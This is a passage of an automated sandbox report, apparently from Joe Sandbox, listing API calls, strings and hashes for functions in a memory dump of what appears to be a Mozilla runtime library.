                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                  • API String ID: 145871493-1050664331
                                                                  • Opcode ID: 83acc30f7eb4b503a3f6a1d41bcdcec136af6fad125531d96e4277876ad43930
                                                                  • Instruction ID: e6eb855d41f32aaf160d5be353bcf1ae807e61372f7f7c78f050ab763ed63c24
                                                                  • Opcode Fuzzy Hash: 83acc30f7eb4b503a3f6a1d41bcdcec136af6fad125531d96e4277876ad43930
                                                                  • Instruction Fuzzy Hash: 44E0B6B0604342ABDF00AFAAD8087817AFCEB1A359F018515ED09D2740EFB1B1009F18
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0BC1DE,?,00000000,?,00000000,?,6C06779F), ref: 6C0BC1F8
                                                                  • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C0BC217
                                                                  • FreeLibrary.KERNEL32(?,6C0BC1DE,?,00000000,?,00000000,?,6C06779F), ref: 6C0BC22C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: WinVerifyTrust$wintrust.dll
                                                                  • API String ID: 145871493-2991032369
                                                                  • Opcode ID: 07bf82906e4d54126506c6312836b77de817dc1668ec2cd524affafffed764a5
                                                                  • Instruction ID: 7498744f6bbd06de975515b9e61bd4c6c29a7a271554f98d66234e3970b06ca1
                                                                  • Opcode Fuzzy Hash: 07bf82906e4d54126506c6312836b77de817dc1668ec2cd524affafffed764a5
                                                                  • Instruction Fuzzy Hash: 59E0B6742013829FDF00BFA1CD087067EFCAB56205F048525AE04D2785EFB5B0408B56
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0677F6), ref: 6C0BC248
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C0BC267
                                                                  • FreeLibrary.KERNEL32(?,6C0677F6), ref: 6C0BC27C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                                  • API String ID: 145871493-3357690181
                                                                  • Opcode ID: b6b4bdcd57452a5f2c542e8c4e800e5dd86ccc9e6a4d1aa5192dd548256257fa
                                                                  • Instruction ID: d66d3e2e0fbf5c12bae31c7d2ad402d496d1109dbd5d73540649dabd7866c33b
                                                                  • Opcode Fuzzy Hash: b6b4bdcd57452a5f2c542e8c4e800e5dd86ccc9e6a4d1aa5192dd548256257fa
                                                                  • Instruction Fuzzy Hash: 34E092742003029BDF04AFA2A8087057AFCAB0B389F508526EE04D3740EFB1A080AF52
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0677C5), ref: 6C0BC298
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C0BC2B7
                                                                  • FreeLibrary.KERNEL32(?,6C0677C5), ref: 6C0BC2CC
                                                                  Strings
                                                                  • CryptCATAdminCalcHashFromFileHandle, xrefs: 6C0BC2B1
                                                                  • wintrust.dll, xrefs: 6C0BC293
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                  • API String ID: 145871493-1423897460
                                                                  • Opcode ID: 00ca8f6e37b0df527d4c2a7fb746380e700f5bab2a066addbc05e77bc04ff653
                                                                  • Instruction ID: 58d530b5939b7b516f568e7e82d14ee5232306a53ae48b61a1b19932c4317ff5
                                                                  • Opcode Fuzzy Hash: 00ca8f6e37b0df527d4c2a7fb746380e700f5bab2a066addbc05e77bc04ff653
                                                                  • Instruction Fuzzy Hash: 81E0B6742413029FDF00BFA9C9087027FFCEB06205F488526EE0996B10EFB1B040CB52
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(kernelbase.dll,?,6C0605BC), ref: 6C0BBAB8
                                                                  • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C0BBAD7
                                                                  • FreeLibrary.KERNEL32(?,6C0605BC), ref: 6C0BBAEC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: VirtualAlloc2$kernelbase.dll
                                                                  • API String ID: 145871493-1188699709
                                                                  • Opcode ID: 13358104f76a7cd1d30cf1d4727d33c3594a2861000a7a6184729ba740adda93
                                                                  • Instruction ID: effbbc3dea45afb9beea9759a8c92604355c44c4b292b143896a035d4dcc3f82
                                                                  • Opcode Fuzzy Hash: 13358104f76a7cd1d30cf1d4727d33c3594a2861000a7a6184729ba740adda93
                                                                  • Instruction Fuzzy Hash: 81E0BD70601382ABEF00AF62C958B167BFCA706209F14842AAD08D2700EFB9B1848B12
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,?,?,6C0BBE49), ref: 6C0BBEC4
                                                                  • RtlCaptureStackBackTrace.NTDLL ref: 6C0BBEDE
                                                                  • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C0BBE49), ref: 6C0BBF38
                                                                  • RtlReAllocateHeap.NTDLL ref: 6C0BBF83
                                                                  • RtlFreeHeap.NTDLL(6C0BBE49,00000000), ref: 6C0BBFA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                  • String ID:
                                                                  • API String ID: 2764315370-0
                                                                  • Opcode ID: d344122f422675e86c9c460f64cbe8e5ee2bde0b190cded9986559ac93a029e5
                                                                  • Instruction ID: 9f8c895a66dd044a7185cf94c144e0e9557bc07e9fa2de5dadb0108b0da38598
                                                                  • Opcode Fuzzy Hash: d344122f422675e86c9c460f64cbe8e5ee2bde0b190cded9986559ac93a029e5
                                                                  • Instruction Fuzzy Hash: 5D517D71A002168FE714CF69CDC0BAAB7E2FF88314F294629D515A7B54D731F9068B80
                                                                  APIs
                                                                  • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C08E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C0B5A47
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C08E56A,?,|UrlbarCSSSpan), ref: 6C0B5A5C
                                                                  • free.MOZGLUE(?), ref: 6C0B5A97
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C0B5B9D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$mallocmemset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2682772760-2178588373
                                                                  • Opcode ID: 2b4e0797ffd95a745a1131942a8edf835600fa93a4acd4b8fcf97c04424d647f
                                                                  • Instruction ID: f1aa4fc7ea28d1251b54ab30c174cdfab57dc6faf4115006d03763ecb817a694
                                                                  • Opcode Fuzzy Hash: 2b4e0797ffd95a745a1131942a8edf835600fa93a4acd4b8fcf97c04424d647f
                                                                  • Instruction Fuzzy Hash: A5515E746087409FD700CF29C8C0B1ABBE5FF89318F04C96DE899AB646D775E945CB62
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C09B58D,?,?,?,?,?,?,?,6C0CD734,?,?,?,6C0CD734), ref: 6C0A8E6E
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C09B58D,?,?,?,?,?,?,?,6C0CD734,?,?,?,6C0CD734), ref: 6C0A8EBF
                                                                  • free.MOZGLUE(?,?,?,?,6C09B58D,?,?,?,?,?,?,?,6C0CD734,?,?,?), ref: 6C0A8F24
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C09B58D,?,?,?,?,?,?,?,6C0CD734,?,?,?,6C0CD734), ref: 6C0A8F46
                                                                  • free.MOZGLUE(?,?,?,?,6C09B58D,?,?,?,?,?,?,?,6C0CD734,?,?,?), ref: 6C0A8F7A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C09B58D,?,?,?,?,?,?,?,6C0CD734,?,?,?), ref: 6C0A8F8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 4cd78c2014b6428feef18b7dc52409754e31237c3ac678c0513092c66b9882f2
                                                                  • Instruction ID: 4e4eaff3ab69cc507f36aef51594f8f43a6d0c73e86c434afb9de2c4e0fcfc82
                                                                  • Opcode Fuzzy Hash: 4cd78c2014b6428feef18b7dc52409754e31237c3ac678c0513092c66b9882f2
                                                                  • Instruction Fuzzy Hash: B35181B5A012668FEB14CFD4D8807AEB7F2BB48314F15062AD916AB741E731F906CB91
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C065FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0660F4
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C065FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C066180
                                                                  • free.MOZGLUE(?,?,?,?,6C065FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C066211
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C065FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C066229
                                                                  • free.MOZGLUE(?,?,?,?,6C065FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C06625E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C065FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C066271
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 6139c678c9aaa157ee5aac3d35fc86ea576e50d3cc3bc5ebec377d56537959a8
                                                                  • Instruction ID: 28765bae5be09533b611963313cbbd594eae349d3a7dfcd2e6c7af2f81dfae24
                                                                  • Opcode Fuzzy Hash: 6139c678c9aaa157ee5aac3d35fc86ea576e50d3cc3bc5ebec377d56537959a8
                                                                  • Instruction Fuzzy Hash: 0B519CB1A006068FEB14CFA9D8907AEB7F5EF49308F14053DC616DBB51EB31AA58CB51
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C0A2620,?,?,?,6C0960AA,6C095FCB,6C0979A3), ref: 6C0A284D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C0A2620,?,?,?,6C0960AA,6C095FCB,6C0979A3), ref: 6C0A289A
                                                                  • free.MOZGLUE(?,?,?,6C0A2620,?,?,?,6C0960AA,6C095FCB,6C0979A3), ref: 6C0A28F1
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C0A2620,?,?,?,6C0960AA,6C095FCB,6C0979A3), ref: 6C0A2910
                                                                  • free.MOZGLUE(00000001,?,?,6C0A2620,?,?,?,6C0960AA,6C095FCB,6C0979A3), ref: 6C0A293C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C0A2620,?,?,?,6C0960AA,6C095FCB,6C0979A3), ref: 6C0A294E
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: e0596c2508401a868189a3dca3c49b89951c6f27095ce992de73cc02d2c85735
                                                                  • Instruction ID: 72314f43d88e1ff2236e8cf3ac8672c3fa55884cdd375102a8c4242bff7d3b16
                                                                  • Opcode Fuzzy Hash: e0596c2508401a868189a3dca3c49b89951c6f27095ce992de73cc02d2c85735
                                                                  • Instruction Fuzzy Hash: B041E1B1A003068FEB14CFE9D88436A77F6AB49708F140539D95AEB741E731F906CB65
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C05CFF6
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C05D026
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C05D06C
                                                                  • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C05D139
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 1090480015-2608361144
                                                                  • Opcode ID: 2ff796c4f913f5f8ce0c179f22dcd3a3410b85226f51a150aa24ea0cacb1b9c4
                                                                  • Instruction ID: 4cd65251cbcd51137cf44b53ba467ca3346ff6c9fce2243761f33532974d80b1
                                                                  • Opcode Fuzzy Hash: 2ff796c4f913f5f8ce0c179f22dcd3a3410b85226f51a150aa24ea0cacb1b9c4
                                                                  • Instruction Fuzzy Hash: 4F41AD72B013165FDB448E7C8E943AEB6F0EB49714F55023AED28E7784DBA1A9008BC5
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C05CEBD
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C05CEF5
                                                                  • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C05CF4E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$memset
                                                                  • String ID: 0$3JT/
                                                                  • API String ID: 438689982-2847078779
                                                                  • Opcode ID: 6652f9554dc8dbcc92a9d4f81c410829154b7d9d31ffa18f6f70a546933f3a5d
                                                                  • Instruction ID: 06360cafafcadac3b3857d154366559b901bff8247cc01160e681e755a401a85
                                                                  • Opcode Fuzzy Hash: 6652f9554dc8dbcc92a9d4f81c410829154b7d9d31ffa18f6f70a546933f3a5d
                                                                  • Instruction Fuzzy Hash: 4C51F075A042568FCB04CF18C890BAABBE5EF99300F19859DD8595F392D731BD16CBE0
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C065820,?), ref: 6C09D21F
                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,6C065820,?), ref: 6C09D22E
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C065820,?), ref: 6C09D242
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,6C065820,?), ref: 6C09D253
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                  • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C065820,?), ref: 6C09D280
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                                  • String ID:
                                                                  • API String ID: 2029485308-0
                                                                  • Opcode ID: bc17d818eafd90d94a1adcee7b1ba23b5181f7b4262f4f31a23632eeb437600a
                                                                  • Instruction ID: ecf06d728d5df87043589d30addb18f2176f9f743a2e97bbadbf6d1254c5a4a6
                                                                  • Opcode Fuzzy Hash: bc17d818eafd90d94a1adcee7b1ba23b5181f7b4262f4f31a23632eeb437600a
                                                                  • Instruction Fuzzy Hash: 8B31F675A403158BCB00CF58C880BAEBBF5BF9A348F244169DA546B701D372F806CBE2
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DF770), ref: 6C0BA858
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0BA87B
                                                                    • Part of subcall function 6C0BA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C0BA88F,00000000), ref: 6C0BA9F1
                                                                  • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C0BA8FF
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0BA90C
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF770), ref: 6C0BA97E
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                  • String ID:
                                                                  • API String ID: 1355178011-0
                                                                  • Opcode ID: 3a66ba71d68730a7cb654f5725a9093a1423a4b354a0f831d482d1aa04fa1c8a
                                                                  • Instruction ID: 6262522d94570cb918bb723821037dc7e1559b1efb05eca91f36c8764c39a18e
                                                                  • Opcode Fuzzy Hash: 3a66ba71d68730a7cb654f5725a9093a1423a4b354a0f831d482d1aa04fa1c8a
                                                                  • Instruction Fuzzy Hash: FD4192B0E002089BDB00DFA4D845BDDB7B5FF08324F148629E816AB791D731A945CB91
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(-00000002,?,6C06152B,?,?,?,?,6C061248,?), ref: 6C06159C
                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C06152B,?,?,?,?,6C061248,?), ref: 6C0615BC
                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,6C06152B,?,?,?,?,6C061248,?), ref: 6C0615E7
                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C06152B,?,?,?,?,6C061248,?), ref: 6C061606
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C06152B,?,?,?,?,6C061248,?), ref: 6C061637
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                  • String ID:
                                                                  • API String ID: 733145618-0
                                                                  • Opcode ID: 08778bfdfc4a81f26adcb68c7159f4605f584fc875014648bb84de92e0f6a2f9
                                                                  • Instruction ID: d48440f03e32a5205f38ac7f27ac727998ddc3d12b6e3d02c1c9a6787b86a528
                                                                  • Opcode Fuzzy Hash: 08778bfdfc4a81f26adcb68c7159f4605f584fc875014648bb84de92e0f6a2f9
                                                                  • Instruction Fuzzy Hash: FA31F871A001149BCB188E7DD85066EB7E9AF853647280B2DE423DBFD4EB30E9148792
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000010,?,6C0542D2), ref: 6C05436A
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0542D2), ref: 6C054387
                                                                  • moz_xmalloc.MOZGLUE(80000023,?,6C0542D2), ref: 6C0543B7
                                                                  • free.MOZGLUE(00000000,?,6C0542D2), ref: 6C0543EF
